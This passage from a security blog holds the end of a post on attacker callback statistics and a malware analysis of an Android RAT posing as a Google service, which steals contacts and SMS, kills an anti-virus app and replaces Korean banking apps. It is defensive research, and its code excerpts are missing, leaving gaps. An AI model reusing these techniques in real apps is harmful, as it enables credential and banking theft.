    Also, to mask exfiltrated content, attackers embed information inside
    common files, such as JPGs, to give network scanning tools the
    impression of normal traffic.
  • Attack patterns vary substantially globally:
      • South Korean firms experience the highest level of callback
        communications per organization. Due to a robust internet
        infrastructure, South Korea has emerged as a fertile location for
        cybercriminals to host their CnC infrastructure. For example, FireEye
        found that callbacks from technology firms are most likely to go to
        South Korea.
      • In Japan, 87 percent of callbacks originated and stayed in the
        country. This may give an indication of the high value of Japanese
        intellectual property.
      • In Canada, 99 percent of callbacks exited the country. In the U.K.,
        exit rates were 90 percent. High exit rates indicate attackers
        are unconcerned about detection. In Canada and the U.K., attackers
        appear to be unconcerned about detection and pursue low-hanging fruit
        opportunistically.

Author: Rob Rachwald

The Service You Can’t Refuse: A Secluded HijackRAT

In the Android world, sometimes you can’t stop malware from “serving”
you, especially when the “service” is actually a malicious Android
class running in the background and controlled by a remote access tool
(RAT). Recently, FireEye mobile security researchers discovered such
malware, which pretends to be a “Google Service Framework”, kills an
anti-virus application, and takes other malicious actions.

In the past, we’ve seen Android malware that execute privacy leakage,
banking credential theft, or remote access separately, but this sample
takes Android malware to a new level by combining all of those
activities into one app. In addition, we found the hacker has designed
a framework to conduct bank hijacking and is actively developing
towards this goal. We suspect in the near future there will be a batch
of bank hijacking malware once the framework is completed. Right now,
eight Korean banks are recognized by the attacker, yet the hacker can
quickly expand to new banks with just 30 minutes of work.

Although the IP addresses we have captured don’t reveal who the
attacker is, as the computer of the IP might be a victim as well, we
have found from the UI that both the malware developer and the victims
are Korean speakers.

Fig. 1. The structure of the HijackRAT malware.

The package name of this new RAT malware is “com.ll” and appears as
“Google Service Framework” with the default Android icon. Android
users can’t remove the app unless they deactivate its administrative
privileges in “Settings.” So far, the Virus Total score of the sample
is only five positive detections out of 54 AV vendors [1]. Such new
malware is published quickly partly because the CNC server, which the
hacker uses, changes so rapidly.

Fig. 2. The Virus Total detection of the malware sample. [1]
Fig. 3. The fake “Google Service Framework” icon in the home screen.

A few seconds after the malicious app is installed, the “Google
Services” icon appears on the home screen. When the icon is clicked,
the app asks for administrative privilege. Once activated, the
uninstallation option is disabled and a new service named “GS” is
started as shown below. The icon will show “App isn’t
installed.” when the user tries to click it again, and it then
removes itself from the home screen.

Fig. 4. The background service of the malware.

The malware has plenty of malicious actions, which the RAT can
command, as shown below.


Within a few minutes, the app connects with the CNC server and begins
to receive a task list from it:


The content is Base64-encoded (RFC 2045). When decoded, it is a
JSONObject with the content {“task”: {“0”: 0}}. The server IP is
located in Hong Kong. We cannot tell if it’s the hacker’s IP or a
victim IP controlled by the RAT, but the URL is named after the device
ID and the UUID generated by the CNC server.

The code below shows how the URL of the HTTP GET request is constructed:



The task list shown above triggers the first malicious action,
“Upload Phone Detail.” When it is executed, the user’s private information
is uploaded to the server with an HTTP POST request. The
information contains the phone number, the device ID, and the contact list,
as shown below in the network packet of the request:


When decoded, the contents of the red and blue parts of the PCap are
shown below, respectively:

1. The red part:


2. The blue part:


The contact list shown above is already highly sensitive, yet if
the user has installed banking applications, the malware
scans for them too.

In a testing device, we installed the eight Korean bank apps as
shown below:

Fig. 5. The eight banking apps.

When this was done, we found that the value of
“banklist” in the PCap was no longer N/A:


The “banklist” entry in the PCap is filled with the short names
of the banks that we installed. There is a map of the short names
and package names of the eight banking apps installed on the phone:


The map of the banks is stored in a database and used in another
malicious action controlled by the CNC server too.


In this malicious action, the CNC server sends a command to
replace the existing bank apps. The eight banking apps require the
installation of “com.ahnlab.v3mobileplus,” a popular
anti-virus application available on Google Play. In order to evade
detection, the malware kills the anti-virus application before
manipulating the bank apps. In the code shown below, Conf.LV holds
the package name “com.ahnlab.v3mobileplus” that is killed.


Then, the malware app parses the banking apps that the user has
installed on the Android device and stores them in the database
under /data/data/com.ll/database/simple_pref. The red block below
shows the bank list stored in the database:
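A forensic helper for the database mentioned above, added here as an example and not part of the original post. The writeup only shows the bank list in a screenshot, so the real table layout is unknown; instead of assuming a schema, the function walks every user table in a copy of the SQLite file and returns every cell value that looks like an Android package name. The in-memory database it builds for the demonstration is constructed, and the bank package names in it are hypothetical placeholders (only the short names “BH” and “NH” come from the writeup).

```python
import re
import sqlite3

# Lower-case dotted identifiers with at least one dot: the usual shape of an
# Android package name (e.g. com.ahnlab.v3mobileplus).
PACKAGE_RE = re.compile(r"\b[a-z][a-z0-9_]*(?:\.[a-z][a-z0-9_]*)+\b")


def build_sample_db():
    """Constructed stand-in for the malware's database; the real schema is not on the page."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE pref (k TEXT, v TEXT)")
    con.executemany("INSERT INTO pref VALUES (?, ?)", [
        ("device_id", "HYPOTHETICAL-DEVICE-ID"),
        # hypothetical short-name / package-name pairs; only BH and NH are from the writeup
        ("bank_1", "BH|com.example.bank.bh"),
        ("bank_2", "NH|com.example.bank.nh"),
    ])
    con.execute("CREATE TABLE sms (sender TEXT, body TEXT)")
    con.execute("INSERT INTO sms VALUES ('+0000', 'constructed message text')")
    con.commit()
    return con


def list_user_tables(con):
    """Names of all non-internal tables, regardless of schema."""
    rows = con.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")
    return [r[0] for r in rows]


def extract_package_names(con):
    """Scan every text cell in every table and return the set of package-like strings."""
    found = set()
    for table in list_user_tables(con):
        # Table names come from sqlite_master, not user input; quoting keeps odd names safe.
        for row in con.execute(f'SELECT * FROM "{table}"'):
            for cell in row:
                if isinstance(cell, str):
                    found.update(PACKAGE_RE.findall(cell))
    return found


def open_copy(path):
    """Open a pulled database file read-only so the evidence copy is never modified."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


if __name__ == "__main__":
    con = build_sample_db()
    for name in sorted(extract_package_names(con)):
        print(name)
```

In practice the file would be pulled from a rooted test device (the writeup names the path /data/data/com.ll/database/simple_pref) and opened with `open_copy()`, which uses SQLite's read-only URI mode so the evidence is not altered during analysis.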


Once the corresponding command is sent from the RAT, the
resolvePopWindow() method is called and the device pops up a
window with the message: “The new version has been released. Please
use after reinstallation.”


The malware then tries to download an app, whose name is
“update” followed by the bank’s short name, from the CNC server,
while simultaneously uninstalling the real, original bank app.


In the code shown above, “mpath” contains the CNC server IP
( and path (determined by the RAT); “mbkname” is the
bank name retrieved from the SQLite database. The fake APK (e.g.
“updateBH.apk”) is downloaded from the CNC server; however,
we do not know what the fake apps look like, because during our research
the command for this malicious action was never issued from the RAT.
Still, the source of the “update*.apk” files is definitely not certified by the
banks, and they might be harmful to the Android user.


When the command to “update” is sent from the RAT, a similar app,
“update.apk”, is downloaded from the CNC server and installed on the
Android phone:



When the command to upload SMS is received from the RAT, the SMS
messages on the Android phone are uploaded to the CNC server. Each SMS
message is stored in the database as soon as it is received:



Then the SMS is read from the database and uploaded to the CNC server
once the command is received:



Similarly, when the send-SMS command is received, the contact list
is sent out through SMS.



Interestingly, we found a partially finished method called “Bank
Hijack.” The code below partially shows how the BankHijack method
works. The malware reads the short bank name, e.g. “NH”, and then
keeps installing updateNH.apk from the CNC server until it is the
newest version.


So far, the part after the installation of the fake app is not
finished. We believe the hacker is temporarily having some problems
completing the function.


As shown above, the hacker has designed and prepared the
framework for a more malicious command from the CNC server, to be used once the
hijack methods are finished. Given the unique nature of how this app
works, including its ability to pull down multiple levels of personal
information and impersonate banking apps, a more robust mobile banking
threat could be on the horizon.




Author: Jinjian Zhai